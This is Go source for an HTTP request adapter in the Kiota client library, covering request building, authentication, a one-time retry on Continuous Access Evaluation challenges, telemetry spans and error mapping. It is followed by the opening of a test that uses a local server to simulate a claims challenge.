NewNetHttpRequestAdapterWithParseNodeFactoryAndSerializationWriterFactoryAndHttpClientAndObservabilityOptions creates a new NetHttpRequestAdapter with the given parameters 74 | func NewNetHttpRequestAdapterWithParseNodeFactoryAndSerializationWriterFactoryAndHttpClientAndObservabilityOptions(authenticationProvider absauth.AuthenticationProvider, parseNodeFactory absser.ParseNodeFactory, serializationWriterFactory absser.SerializationWriterFactory, httpClient *nethttp.Client, observabilityOptions ObservabilityOptions) (*NetHttpRequestAdapter, error) { 75 | if authenticationProvider == nil { 76 | return nil, errors.New("authenticationProvider cannot be nil") 77 | } 78 | result := &NetHttpRequestAdapter{ 79 | serializationWriterFactory: serializationWriterFactory, 80 | parseNodeFactory: parseNodeFactory, 81 | httpClient: httpClient, 82 | authenticationProvider: authenticationProvider, 83 | baseUrl: "", 84 | observabilityOptions: observabilityOptions, 85 | } 86 | if result.httpClient == nil { 87 | defaultClient 
:= GetDefaultClient() 88 | result.httpClient = defaultClient 89 | } 90 | if result.serializationWriterFactory == nil { 91 | result.serializationWriterFactory = absser.DefaultSerializationWriterFactoryInstance 92 | } 93 | if result.parseNodeFactory == nil { 94 | result.parseNodeFactory = absser.DefaultParseNodeFactoryInstance 95 | } 96 | return result, nil 97 | } 98 | 99 | // GetSerializationWriterFactory returns the serialization writer factory currently in use for the request adapter service. 100 | func (a *NetHttpRequestAdapter) GetSerializationWriterFactory() absser.SerializationWriterFactory { 101 | return a.serializationWriterFactory 102 | } 103 | 104 | // EnableBackingStore enables the backing store proxies for the SerializationWriters and ParseNodes in use. 105 | func (a *NetHttpRequestAdapter) EnableBackingStore(factory store.BackingStoreFactory) { 106 | a.parseNodeFactory = abs.EnableBackingStoreForParseNodeFactory(a.parseNodeFactory) 107 | a.serializationWriterFactory = abs.EnableBackingStoreForSerializationWriterFactory(a.serializationWriterFactory) 108 | if factory != nil { 109 | store.BackingStoreFactoryInstance = factory 110 | } 111 | } 112 | 113 | // SetBaseUrl sets the base url for every request. 114 | func (a *NetHttpRequestAdapter) SetBaseUrl(baseUrl string) { 115 | a.baseUrl = baseUrl 116 | } 117 | 118 | // GetBaseUrl gets the base url for every request. 
119 | func (a *NetHttpRequestAdapter) GetBaseUrl() string { 120 | return a.baseUrl 121 | } 122 | 123 | func (a *NetHttpRequestAdapter) getHttpResponseMessage(ctx context.Context, requestInfo *abs.RequestInformation, claims string, spanForAttributes trace.Span) (*nethttp.Response, error) { 124 | ctx, span := otel.GetTracerProvider().Tracer(a.observabilityOptions.GetTracerInstrumentationName()).Start(ctx, "getHttpResponseMessage") 125 | defer span.End() 126 | if ctx == nil { 127 | ctx = context.Background() 128 | } 129 | a.setBaseUrlForRequestInformation(requestInfo) 130 | additionalContext := make(map[string]any) 131 | if claims != "" { 132 | additionalContext[claimsKey] = claims 133 | } 134 | err := a.authenticationProvider.AuthenticateRequest(ctx, requestInfo, additionalContext) 135 | if err != nil { 136 | return nil, err 137 | } 138 | request, err := a.getRequestFromRequestInformation(ctx, requestInfo, spanForAttributes) 139 | if err != nil { 140 | return nil, err 141 | } 142 | response, err := (*a.httpClient).Do(request) 143 | if err != nil { 144 | spanForAttributes.RecordError(err) 145 | return nil, err 146 | } 147 | if response != nil { 148 | contentLenHeader := response.Header.Get("Content-Length") 149 | if contentLenHeader != "" { 150 | contentLen, _ := strconv.Atoi(contentLenHeader) 151 | spanForAttributes.SetAttributes(httpResponseBodySizeAttribute.Int(contentLen)) 152 | } 153 | contentTypeHeader := response.Header.Get("Content-Type") 154 | if contentTypeHeader != "" { 155 | spanForAttributes.SetAttributes(httpResponseHeaderContentTypeAttribute.String(contentTypeHeader)) 156 | } 157 | spanForAttributes.SetAttributes( 158 | httpResponseStatusCodeAttribute.Int(response.StatusCode), 159 | networkProtocolNameAttribute.String(response.Proto), 160 | ) 161 | } 162 | return a.retryCAEResponseIfRequired(ctx, response, requestInfo, claims, spanForAttributes) 163 | } 164 | 165 | const claimsKey = "claims" 166 | 167 | var reBearer = regexp.MustCompile(`(?i)^Bearer\s`) 
168 | var reClaims = regexp.MustCompile(`\"([^\"]*)\"`) 169 | 170 | const AuthenticateChallengedEventKey = "com.microsoft.kiota.authenticate_challenge_received" 171 | 172 | func (a *NetHttpRequestAdapter) retryCAEResponseIfRequired(ctx context.Context, response *nethttp.Response, requestInfo *abs.RequestInformation, claims string, spanForAttributes trace.Span) (*nethttp.Response, error) { 173 | ctx, span := otel.GetTracerProvider().Tracer(a.observabilityOptions.GetTracerInstrumentationName()).Start(ctx, "retryCAEResponseIfRequired") 174 | defer span.End() 175 | if response.StatusCode == 401 && 176 | claims == "" { //avoid infinite loop, we only retry once 177 | authenticateHeaderVal := response.Header.Get("WWW-Authenticate") 178 | if authenticateHeaderVal != "" && reBearer.Match([]byte(authenticateHeaderVal)) { 179 | span.AddEvent(AuthenticateChallengedEventKey) 180 | spanForAttributes.SetAttributes(httpRequestResendCountAttribute.Int(1)) 181 | responseClaims := "" 182 | parametersRaw := string(reBearer.ReplaceAll([]byte(authenticateHeaderVal), []byte(""))) 183 | parameters := strings.Split(parametersRaw, ",") 184 | for _, parameter := range parameters { 185 | if strings.HasPrefix(strings.Trim(parameter, " "), claimsKey) { 186 | responseClaims = reClaims.FindStringSubmatch(parameter)[1] 187 | break 188 | } 189 | } 190 | if responseClaims != "" { 191 | defer a.purge(response) 192 | return a.getHttpResponseMessage(ctx, requestInfo, responseClaims, spanForAttributes) 193 | } 194 | } 195 | } 196 | return response, nil 197 | } 198 | 199 | func (a *NetHttpRequestAdapter) getResponsePrimaryContentType(response *nethttp.Response) string { 200 | if response.Header == nil { 201 | return "" 202 | } 203 | rawType := response.Header.Get("Content-Type") 204 | splat := strings.Split(rawType, ";") 205 | return strings.ToLower(splat[0]) 206 | } 207 | 208 | func (a *NetHttpRequestAdapter) setBaseUrlForRequestInformation(requestInfo *abs.RequestInformation) { 209 | 
requestInfo.PathParameters["baseurl"] = a.GetBaseUrl() 210 | } 211 | 212 | func (a *NetHttpRequestAdapter) prepareContext(ctx context.Context, requestInfo *abs.RequestInformation) context.Context { 213 | if ctx == nil { 214 | ctx = context.Background() 215 | } 216 | // set deadline if not set in receiving context 217 | // ignore if timeout is 0 as it means no timeout 218 | if _, deadlineSet := ctx.Deadline(); !deadlineSet && a.httpClient.Timeout != 0 { 219 | ctx, _ = context.WithTimeout(ctx, a.httpClient.Timeout) 220 | } 221 | 222 | for _, value := range requestInfo.GetRequestOptions() { 223 | ctx = context.WithValue(ctx, value.GetKey(), value) 224 | } 225 | obsOptionsSet := false 226 | if reqObsOpt := ctx.Value(observabilityOptionsKeyValue); reqObsOpt != nil { 227 | if _, ok := reqObsOpt.(ObservabilityOptionsInt); ok { 228 | obsOptionsSet = true 229 | } 230 | } 231 | if !obsOptionsSet { 232 | ctx = context.WithValue(ctx, observabilityOptionsKeyValue, &a.observabilityOptions) 233 | } 234 | return ctx 235 | } 236 | 237 | // ConvertToNativeRequest converts the given RequestInformation into a native HTTP request. 
238 | func (a *NetHttpRequestAdapter) ConvertToNativeRequest(context context.Context, requestInfo *abs.RequestInformation) (any, error) { 239 | err := a.authenticationProvider.AuthenticateRequest(context, requestInfo, nil) 240 | if err != nil { 241 | return nil, err 242 | } 243 | request, err := a.getRequestFromRequestInformation(context, requestInfo, nil) 244 | if err != nil { 245 | return nil, err 246 | } 247 | return request, nil 248 | } 249 | 250 | func (a *NetHttpRequestAdapter) getRequestFromRequestInformation(ctx context.Context, requestInfo *abs.RequestInformation, spanForAttributes trace.Span) (*nethttp.Request, error) { 251 | ctx, span := otel.GetTracerProvider().Tracer(a.observabilityOptions.GetTracerInstrumentationName()).Start(ctx, "getRequestFromRequestInformation") 252 | defer span.End() 253 | if spanForAttributes == nil { 254 | spanForAttributes = span 255 | } 256 | spanForAttributes.SetAttributes(httpRequestMethodAttribute.String(requestInfo.Method.String())) 257 | uri, err := requestInfo.GetUri() 258 | if err != nil { 259 | spanForAttributes.RecordError(err) 260 | return nil, err 261 | } 262 | spanForAttributes.SetAttributes( 263 | serverAddressAttribute.String(uri.Scheme), 264 | urlSchemeAttribute.String(uri.Host), 265 | ) 266 | 267 | if a.observabilityOptions.IncludeEUIIAttributes { 268 | spanForAttributes.SetAttributes(urlFullAttribute.String(uri.String())) 269 | } 270 | 271 | request, err := nethttp.NewRequestWithContext(ctx, requestInfo.Method.String(), uri.String(), nil) 272 | 273 | if err != nil { 274 | spanForAttributes.RecordError(err) 275 | return nil, err 276 | } 277 | if len(requestInfo.Content) > 0 { 278 | reader := bytes.NewReader(requestInfo.Content) 279 | request.Body = NopCloser(reader) 280 | } 281 | if request.Header == nil { 282 | request.Header = make(nethttp.Header) 283 | } 284 | if requestInfo.Headers != nil { 285 | for _, key := range requestInfo.Headers.ListKeys() { 286 | values := requestInfo.Headers.Get(key) 287 | for _, 
v := range values { 288 | request.Header.Add(key, v) 289 | } 290 | } 291 | if request.Header.Get("Content-Type") != "" { 292 | spanForAttributes.SetAttributes( 293 | httpRequestHeaderContentTypeAttribute.String(request.Header.Get("Content-Type")), 294 | ) 295 | } 296 | if request.Header.Get("Content-Length") != "" { 297 | contentLenVal, _ := strconv.Atoi(request.Header.Get("Content-Length")) 298 | request.ContentLength = int64(contentLenVal) 299 | spanForAttributes.SetAttributes( 300 | httpRequestBodySizeAttribute.Int(contentLenVal), 301 | ) 302 | } 303 | } 304 | 305 | return request, nil 306 | } 307 | 308 | const EventResponseHandlerInvokedKey = "com.microsoft.kiota.response_handler_invoked" 309 | 310 | var queryParametersCleanupRegex = regexp.MustCompile(`\{\?[^\}]+}`) 311 | 312 | func (a *NetHttpRequestAdapter) startTracingSpan(ctx context.Context, requestInfo *abs.RequestInformation, methodName string) (context.Context, trace.Span) { 313 | decodedUriTemplate := decodeUriEncodedString(requestInfo.UrlTemplate, []byte{'-', '.', '~', '$'}) 314 | telemetryPathValue := queryParametersCleanupRegex.ReplaceAll([]byte(decodedUriTemplate), []byte("")) 315 | ctx, span := otel.GetTracerProvider().Tracer(a.observabilityOptions.GetTracerInstrumentationName()).Start(ctx, methodName+" - "+string(telemetryPathValue)) 316 | span.SetAttributes(urlUriTemplateAttribute.String(decodedUriTemplate)) 317 | return ctx, span 318 | } 319 | 320 | // Send executes the HTTP request specified by the given RequestInformation and returns the deserialized response model. 
321 | func (a *NetHttpRequestAdapter) Send(ctx context.Context, requestInfo *abs.RequestInformation, constructor absser.ParsableFactory, errorMappings abs.ErrorMappings) (absser.Parsable, error) { 322 | if requestInfo == nil { 323 | return nil, errors.New("requestInfo cannot be nil") 324 | } 325 | ctx = a.prepareContext(ctx, requestInfo) 326 | ctx, span := a.startTracingSpan(ctx, requestInfo, "Send") 327 | defer span.End() 328 | response, err := a.getHttpResponseMessage(ctx, requestInfo, "", span) 329 | if err != nil { 330 | return nil, err 331 | } 332 | 333 | responseHandler := getResponseHandler(ctx) 334 | if responseHandler != nil { 335 | span.AddEvent(EventResponseHandlerInvokedKey) 336 | result, err := responseHandler(response, errorMappings) 337 | if err != nil { 338 | span.RecordError(err) 339 | return nil, err 340 | } 341 | if result == nil { 342 | return nil, nil 343 | } 344 | return result.(absser.Parsable), nil 345 | } else if response != nil { 346 | defer a.purge(response) 347 | err = a.throwIfFailedResponse(ctx, response, errorMappings, span) 348 | if err != nil { 349 | return nil, err 350 | } 351 | if a.shouldReturnNil(response) { 352 | return nil, nil 353 | } 354 | parseNode, _, err := a.getRootParseNode(ctx, response, span) 355 | if err != nil { 356 | return nil, err 357 | } 358 | if parseNode == nil { 359 | return nil, nil 360 | } 361 | _, deserializeSpan := otel.GetTracerProvider().Tracer(a.observabilityOptions.GetTracerInstrumentationName()).Start(ctx, "GetObjectValue") 362 | defer deserializeSpan.End() 363 | result, err := parseNode.GetObjectValue(constructor) 364 | a.setResponseType(result, span) 365 | if err != nil { 366 | span.RecordError(err) 367 | } 368 | return result, err 369 | } else { 370 | return nil, errors.New("response is nil") 371 | } 372 | } 373 | 374 | func (a *NetHttpRequestAdapter) setResponseType(result any, span trace.Span) { 375 | if result != nil { 376 | 
span.SetAttributes(attribute.String("com.microsoft.kiota.response.type", reflect.TypeOf(result).String())) 377 | } 378 | } 379 | 380 | // SendEnum executes the HTTP request specified by the given RequestInformation and returns the deserialized response model. 381 | func (a *NetHttpRequestAdapter) SendEnum(ctx context.Context, requestInfo *abs.RequestInformation, parser absser.EnumFactory, errorMappings abs.ErrorMappings) (any, error) { 382 | if requestInfo == nil { 383 | return nil, errors.New("requestInfo cannot be nil") 384 | } 385 | ctx = a.prepareContext(ctx, requestInfo) 386 | ctx, span := a.startTracingSpan(ctx, requestInfo, "SendEnum") 387 | defer span.End() 388 | response, err := a.getHttpResponseMessage(ctx, requestInfo, "", span) 389 | if err != nil { 390 | return nil, err 391 | } 392 | 393 | responseHandler := getResponseHandler(ctx) 394 | if responseHandler != nil { 395 | span.AddEvent(EventResponseHandlerInvokedKey) 396 | result, err := responseHandler(response, errorMappings) 397 | if err != nil { 398 | span.RecordError(err) 399 | return nil, err 400 | } 401 | if result == nil { 402 | return nil, nil 403 | } 404 | return result.(absser.Parsable), nil 405 | } else if response != nil { 406 | defer a.purge(response) 407 | err = a.throwIfFailedResponse(ctx, response, errorMappings, span) 408 | if err != nil { 409 | return nil, err 410 | } 411 | if a.shouldReturnNil(response) { 412 | return nil, nil 413 | } 414 | parseNode, _, err := a.getRootParseNode(ctx, response, span) 415 | if err != nil { 416 | return nil, err 417 | } 418 | if parseNode == nil { 419 | return nil, nil 420 | } 421 | _, deserializeSpan := otel.GetTracerProvider().Tracer(a.observabilityOptions.GetTracerInstrumentationName()).Start(ctx, "GetEnumValue") 422 | defer deserializeSpan.End() 423 | result, err := parseNode.GetEnumValue(parser) 424 | a.setResponseType(result, span) 425 | if err != nil { 426 | span.RecordError(err) 427 | } 428 | return result, err 429 | } else { 430 | return nil, 
errors.New("response is nil") 431 | } 432 | } 433 | 434 | // SendCollection executes the HTTP request specified by the given RequestInformation and returns the deserialized response model collection. 435 | func (a *NetHttpRequestAdapter) SendCollection(ctx context.Context, requestInfo *abs.RequestInformation, constructor absser.ParsableFactory, errorMappings abs.ErrorMappings) ([]absser.Parsable, error) { 436 | if requestInfo == nil { 437 | return nil, errors.New("requestInfo cannot be nil") 438 | } 439 | ctx = a.prepareContext(ctx, requestInfo) 440 | ctx, span := a.startTracingSpan(ctx, requestInfo, "SendCollection") 441 | defer span.End() 442 | response, err := a.getHttpResponseMessage(ctx, requestInfo, "", span) 443 | if err != nil { 444 | return nil, err 445 | } 446 | 447 | responseHandler := getResponseHandler(ctx) 448 | if responseHandler != nil { 449 | span.AddEvent(EventResponseHandlerInvokedKey) 450 | result, err := responseHandler(response, errorMappings) 451 | if err != nil { 452 | span.RecordError(err) 453 | return nil, err 454 | } 455 | if result == nil { 456 | return nil, nil 457 | } 458 | return result.([]absser.Parsable), nil 459 | } else if response != nil { 460 | defer a.purge(response) 461 | err = a.throwIfFailedResponse(ctx, response, errorMappings, span) 462 | if err != nil { 463 | return nil, err 464 | } 465 | if a.shouldReturnNil(response) { 466 | return nil, nil 467 | } 468 | parseNode, _, err := a.getRootParseNode(ctx, response, span) 469 | if err != nil { 470 | return nil, err 471 | } 472 | if parseNode == nil { 473 | return nil, nil 474 | } 475 | _, deserializeSpan := otel.GetTracerProvider().Tracer(a.observabilityOptions.GetTracerInstrumentationName()).Start(ctx, "GetCollectionOfObjectValues") 476 | defer deserializeSpan.End() 477 | result, err := parseNode.GetCollectionOfObjectValues(constructor) 478 | a.setResponseType(result, span) 479 | if err != nil { 480 | span.RecordError(err) 481 | } 482 | return result, err 483 | } else { 484 | 
return nil, errors.New("response is nil") 485 | } 486 | } 487 | 488 | // SendEnumCollection executes the HTTP request specified by the given RequestInformation and returns the deserialized response model collection. 489 | func (a *NetHttpRequestAdapter) SendEnumCollection(ctx context.Context, requestInfo *abs.RequestInformation, parser absser.EnumFactory, errorMappings abs.ErrorMappings) ([]any, error) { 490 | if requestInfo == nil { 491 | return nil, errors.New("requestInfo cannot be nil") 492 | } 493 | ctx = a.prepareContext(ctx, requestInfo) 494 | ctx, span := a.startTracingSpan(ctx, requestInfo, "SendEnumCollection") 495 | defer span.End() 496 | response, err := a.getHttpResponseMessage(ctx, requestInfo, "", span) 497 | if err != nil { 498 | return nil, err 499 | } 500 | 501 | responseHandler := getResponseHandler(ctx) 502 | if responseHandler != nil { 503 | span.AddEvent(EventResponseHandlerInvokedKey) 504 | result, err := responseHandler(response, errorMappings) 505 | if err != nil { 506 | span.RecordError(err) 507 | return nil, err 508 | } 509 | if result == nil { 510 | return nil, nil 511 | } 512 | return result.([]any), nil 513 | } else if response != nil { 514 | defer a.purge(response) 515 | err = a.throwIfFailedResponse(ctx, response, errorMappings, span) 516 | if err != nil { 517 | return nil, err 518 | } 519 | if a.shouldReturnNil(response) { 520 | return nil, nil 521 | } 522 | parseNode, _, err := a.getRootParseNode(ctx, response, span) 523 | if err != nil { 524 | return nil, err 525 | } 526 | if parseNode == nil { 527 | return nil, nil 528 | } 529 | _, deserializeSpan := otel.GetTracerProvider().Tracer(a.observabilityOptions.GetTracerInstrumentationName()).Start(ctx, "GetCollectionOfEnumValues") 530 | defer deserializeSpan.End() 531 | result, err := parseNode.GetCollectionOfEnumValues(parser) 532 | a.setResponseType(result, span) 533 | if err != nil { 534 | span.RecordError(err) 535 | } 536 | return result, err 537 | } else { 538 | return nil, 
errors.New("response is nil") 539 | } 540 | } 541 | 542 | func getResponseHandler(ctx context.Context) abs.ResponseHandler { 543 | var handlerOption = ctx.Value(abs.ResponseHandlerOptionKey) 544 | if handlerOption != nil { 545 | return handlerOption.(abs.RequestHandlerOption).GetResponseHandler() 546 | } 547 | return nil 548 | } 549 | 550 | // SendPrimitive executes the HTTP request specified by the given RequestInformation and returns the deserialized primitive response model. 551 | func (a *NetHttpRequestAdapter) SendPrimitive(ctx context.Context, requestInfo *abs.RequestInformation, typeName string, errorMappings abs.ErrorMappings) (any, error) { 552 | if requestInfo == nil { 553 | return nil, errors.New("requestInfo cannot be nil") 554 | } 555 | ctx = a.prepareContext(ctx, requestInfo) 556 | ctx, span := a.startTracingSpan(ctx, requestInfo, "SendPrimitive") 557 | defer span.End() 558 | response, err := a.getHttpResponseMessage(ctx, requestInfo, "", span) 559 | if err != nil { 560 | return nil, err 561 | } 562 | 563 | responseHandler := getResponseHandler(ctx) 564 | if responseHandler != nil { 565 | span.AddEvent(EventResponseHandlerInvokedKey) 566 | result, err := responseHandler(response, errorMappings) 567 | if err != nil { 568 | span.RecordError(err) 569 | return nil, err 570 | } 571 | if result == nil { 572 | return nil, nil 573 | } 574 | return result.(absser.Parsable), nil 575 | } else if response != nil { 576 | defer a.purge(response) 577 | err = a.throwIfFailedResponse(ctx, response, errorMappings, span) 578 | if err != nil { 579 | return nil, err 580 | } 581 | if a.shouldReturnNil(response) { 582 | return nil, nil 583 | } 584 | if typeName == "[]byte" { 585 | res, err := io.ReadAll(response.Body) 586 | if err != nil { 587 | span.RecordError(err) 588 | return nil, err 589 | } else if len(res) == 0 { 590 | return nil, nil 591 | } 592 | return res, nil 593 | } 594 | parseNode, _, err := a.getRootParseNode(ctx, response, span) 595 | if err != nil { 596 | 
return nil, err 597 | } 598 | if parseNode == nil { 599 | return nil, nil 600 | } 601 | _, deserializeSpan := otel.GetTracerProvider().Tracer(a.observabilityOptions.GetTracerInstrumentationName()).Start(ctx, "Get"+typeName+"Value") 602 | defer deserializeSpan.End() 603 | var result any 604 | switch typeName { 605 | case "string": 606 | result, err = parseNode.GetStringValue() 607 | case "float32": 608 | result, err = parseNode.GetFloat32Value() 609 | case "float64": 610 | result, err = parseNode.GetFloat64Value() 611 | case "int32": 612 | result, err = parseNode.GetInt32Value() 613 | case "int64": 614 | result, err = parseNode.GetInt64Value() 615 | case "bool": 616 | result, err = parseNode.GetBoolValue() 617 | case "Time": 618 | result, err = parseNode.GetTimeValue() 619 | case "UUID": 620 | result, err = parseNode.GetUUIDValue() 621 | default: 622 | return nil, errors.New("unsupported type") 623 | } 624 | a.setResponseType(result, span) 625 | if err != nil { 626 | span.RecordError(err) 627 | } 628 | return result, err 629 | } else { 630 | return nil, errors.New("response is nil") 631 | } 632 | } 633 | 634 | // SendPrimitiveCollection executes the HTTP request specified by the given RequestInformation and returns the deserialized primitive response model collection. 
635 | func (a *NetHttpRequestAdapter) SendPrimitiveCollection(ctx context.Context, requestInfo *abs.RequestInformation, typeName string, errorMappings abs.ErrorMappings) ([]any, error) { 636 | if requestInfo == nil { 637 | return nil, errors.New("requestInfo cannot be nil") 638 | } 639 | ctx = a.prepareContext(ctx, requestInfo) 640 | ctx, span := a.startTracingSpan(ctx, requestInfo, "SendPrimitiveCollection") 641 | defer span.End() 642 | response, err := a.getHttpResponseMessage(ctx, requestInfo, "", span) 643 | if err != nil { 644 | return nil, err 645 | } 646 | 647 | responseHandler := getResponseHandler(ctx) 648 | if responseHandler != nil { 649 | span.AddEvent(EventResponseHandlerInvokedKey) 650 | result, err := responseHandler(response, errorMappings) 651 | if err != nil { 652 | span.RecordError(err) 653 | return nil, err 654 | } 655 | if result == nil { 656 | return nil, nil 657 | } 658 | return result.([]any), nil 659 | } else if response != nil { 660 | defer a.purge(response) 661 | err = a.throwIfFailedResponse(ctx, response, errorMappings, span) 662 | if err != nil { 663 | return nil, err 664 | } 665 | if a.shouldReturnNil(response) { 666 | return nil, nil 667 | } 668 | parseNode, _, err := a.getRootParseNode(ctx, response, span) 669 | if err != nil { 670 | return nil, err 671 | } 672 | if parseNode == nil { 673 | return nil, nil 674 | } 675 | _, deserializeSpan := otel.GetTracerProvider().Tracer(a.observabilityOptions.GetTracerInstrumentationName()).Start(ctx, "GetCollectionOfPrimitiveValues") 676 | defer deserializeSpan.End() 677 | result, err := parseNode.GetCollectionOfPrimitiveValues(typeName) 678 | a.setResponseType(result, span) 679 | if err != nil { 680 | span.RecordError(err) 681 | } 682 | return result, err 683 | } else { 684 | return nil, errors.New("response is nil") 685 | } 686 | } 687 | 688 | // SendNoContent executes the HTTP request specified by the given RequestInformation with no return content. 
689 | func (a *NetHttpRequestAdapter) SendNoContent(ctx context.Context, requestInfo *abs.RequestInformation, errorMappings abs.ErrorMappings) error { 690 | if requestInfo == nil { 691 | return errors.New("requestInfo cannot be nil") 692 | } 693 | ctx = a.prepareContext(ctx, requestInfo) 694 | ctx, span := a.startTracingSpan(ctx, requestInfo, "SendNoContent") 695 | defer span.End() 696 | response, err := a.getHttpResponseMessage(ctx, requestInfo, "", span) 697 | if err != nil { 698 | return err 699 | } 700 | 701 | responseHandler := getResponseHandler(ctx) 702 | if responseHandler != nil { 703 | span.AddEvent(EventResponseHandlerInvokedKey) 704 | _, err := responseHandler(response, errorMappings) 705 | if err != nil { 706 | span.RecordError(err) 707 | } 708 | return err 709 | } else if response != nil { 710 | defer a.purge(response) 711 | err = a.throwIfFailedResponse(ctx, response, errorMappings, span) 712 | if err != nil { 713 | return err 714 | } 715 | return nil 716 | } else { 717 | return errors.New("response is nil") 718 | } 719 | } 720 | 721 | func (a *NetHttpRequestAdapter) getRootParseNode(ctx context.Context, response *nethttp.Response, spanForAttributes trace.Span) (absser.ParseNode, context.Context, error) { 722 | ctx, span := otel.GetTracerProvider().Tracer(a.observabilityOptions.GetTracerInstrumentationName()).Start(ctx, "getRootParseNode") 723 | defer span.End() 724 | 725 | if response.ContentLength == 0 { 726 | return nil, ctx, nil 727 | } 728 | 729 | body, err := io.ReadAll(response.Body) 730 | if err != nil { 731 | spanForAttributes.RecordError(err) 732 | return nil, ctx, err 733 | } 734 | contentType := a.getResponsePrimaryContentType(response) 735 | if contentType == "" { 736 | return nil, ctx, nil 737 | } 738 | rootNode, err := a.parseNodeFactory.GetRootParseNode(contentType, body) 739 | if err != nil { 740 | spanForAttributes.RecordError(err) 741 | } 742 | return rootNode, ctx, err 743 | } 744 | func (a *NetHttpRequestAdapter) purge(response 
*nethttp.Response) error { 745 | _, _ = io.ReadAll(response.Body) //we don't care about errors comming from reading the body, just trying to purge anything that maybe left 746 | err := response.Body.Close() 747 | if err != nil { 748 | return err 749 | } 750 | return nil 751 | } 752 | func (a *NetHttpRequestAdapter) shouldReturnNil(response *nethttp.Response) bool { 753 | return response.StatusCode == 204 754 | } 755 | 756 | // ErrorMappingFoundAttributeName is the attribute name used to indicate whether an error code mapping was found. 757 | const ErrorMappingFoundAttributeName = "com.microsoft.kiota.error.mapping_found" 758 | 759 | // ErrorBodyFoundAttributeName is the attribute name used to indicate whether the error response contained a body 760 | const ErrorBodyFoundAttributeName = "com.microsoft.kiota.error.body_found" 761 | 762 | func (a *NetHttpRequestAdapter) throwIfFailedResponse(ctx context.Context, response *nethttp.Response, errorMappings abs.ErrorMappings, spanForAttributes trace.Span) error { 763 | ctx, span := otel.GetTracerProvider().Tracer(a.observabilityOptions.GetTracerInstrumentationName()).Start(ctx, "throwIfFailedResponse") 764 | defer span.End() 765 | if response.StatusCode < 400 { 766 | return nil 767 | } 768 | spanForAttributes.SetStatus(codes.Error, "received_error_response") 769 | 770 | statusAsString := strconv.Itoa(response.StatusCode) 771 | responseHeaders := abs.NewResponseHeaders() 772 | for key, values := range response.Header { 773 | for i := range values { 774 | responseHeaders.Add(key, values[i]) 775 | } 776 | } 777 | var errorCtor absser.ParsableFactory = nil 778 | if len(errorMappings) != 0 { 779 | if errorMappings[statusAsString] != nil { 780 | errorCtor = errorMappings[statusAsString] 781 | } else if response.StatusCode >= 400 && response.StatusCode < 500 && errorMappings["4XX"] != nil { 782 | errorCtor = errorMappings["4XX"] 783 | } else if response.StatusCode >= 500 && response.StatusCode < 600 && errorMappings["5XX"] != 
nil { 784 | errorCtor = errorMappings["5XX"] 785 | } else if errorMappings["XXX"] != nil && response.StatusCode >= 400 && response.StatusCode < 600 { 786 | errorCtor = errorMappings["XXX"] 787 | } 788 | } 789 | 790 | if errorCtor == nil { 791 | spanForAttributes.SetAttributes(attribute.Bool(ErrorMappingFoundAttributeName, false)) 792 | err := &abs.ApiError{ 793 | Message: "The server returned an unexpected status code and no error factory is registered for this code: " + statusAsString, 794 | ResponseStatusCode: response.StatusCode, 795 | ResponseHeaders: responseHeaders, 796 | } 797 | spanForAttributes.RecordError(err) 798 | return err 799 | } 800 | spanForAttributes.SetAttributes(attribute.Bool(ErrorMappingFoundAttributeName, true)) 801 | 802 | rootNode, _, err := a.getRootParseNode(ctx, response, spanForAttributes) 803 | if err != nil { 804 | spanForAttributes.RecordError(err) 805 | return err 806 | } 807 | if rootNode == nil { 808 | spanForAttributes.SetAttributes(attribute.Bool(ErrorBodyFoundAttributeName, false)) 809 | err := &abs.ApiError{ 810 | Message: "The server returned an unexpected status code with no response body: " + statusAsString, 811 | ResponseStatusCode: response.StatusCode, 812 | ResponseHeaders: responseHeaders, 813 | } 814 | spanForAttributes.RecordError(err) 815 | return err 816 | } 817 | spanForAttributes.SetAttributes(attribute.Bool(ErrorBodyFoundAttributeName, true)) 818 | 819 | _, deserializeSpan := otel.GetTracerProvider().Tracer(a.observabilityOptions.GetTracerInstrumentationName()).Start(ctx, "GetObjectValue") 820 | defer deserializeSpan.End() 821 | errValue, err := rootNode.GetObjectValue(errorCtor) 822 | if err != nil { 823 | spanForAttributes.RecordError(err) 824 | if apiErrorable, ok := err.(abs.ApiErrorable); ok { 825 | apiErrorable.SetResponseHeaders(responseHeaders) 826 | apiErrorable.SetStatusCode(response.StatusCode) 827 | } 828 | return err 829 | } else if errValue == nil { 830 | return &abs.ApiError{ 831 | Message: "The 
server returned an unexpected status code but the error could not be deserialized: " + statusAsString, 832 | ResponseStatusCode: response.StatusCode, 833 | ResponseHeaders: responseHeaders, 834 | } 835 | } 836 | 837 | if apiErrorable, ok := errValue.(abs.ApiErrorable); ok { 838 | apiErrorable.SetResponseHeaders(responseHeaders) 839 | apiErrorable.SetStatusCode(response.StatusCode) 840 | } 841 | 842 | err = errValue.(error) 843 | 844 | spanForAttributes.RecordError(err) 845 | return err 846 | } 847 | -------------------------------------------------------------------------------- /nethttp_request_adapter_test.go: -------------------------------------------------------------------------------- 1 | package nethttplibrary 2 | 3 | import ( 4 | "context" 5 | "github.com/microsoft/kiota-abstractions-go/serialization" 6 | nethttp "net/http" 7 | httptest "net/http/httptest" 8 | "net/url" 9 | "testing" 10 | 11 | abs "github.com/microsoft/kiota-abstractions-go" 12 | absauth "github.com/microsoft/kiota-abstractions-go/authentication" 13 | absstore "github.com/microsoft/kiota-abstractions-go/store" 14 | "github.com/ordinaryhydr/kiota-http-go/internal" 15 | 16 | "github.com/stretchr/testify/assert" 17 | ) 18 | 19 | func TestItRetriesOnCAEResponse(t *testing.T) { 20 | methodCallCount := 0 21 | 22 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 23 | if methodCallCount > 0 { 24 | res.WriteHeader(200) 25 | } else { 26 | res.Header().Set("WWW-Authenticate", "Bearer realm=\"\", authorization_uri=\"https://login.microsoftonline.com/common/oauth2/authorize\", client_id=\"00000003-0000-0000-c000-000000000000\", error=\"insufficient_claims\", claims=\"eyJhY2Nlc3NfdG9rZW4iOnsibmJmIjp7ImVzc2VudGlhbCI6dHJ1ZSwgInZhbHVlIjoiMTY1MjgxMzUwOCJ9fX0=\"") 27 | res.WriteHeader(401) 28 | } 29 | methodCallCount++ 30 | res.Write([]byte("body")) 31 | })) 32 | defer func() { testServer.Close() }() 33 | authProvider := 
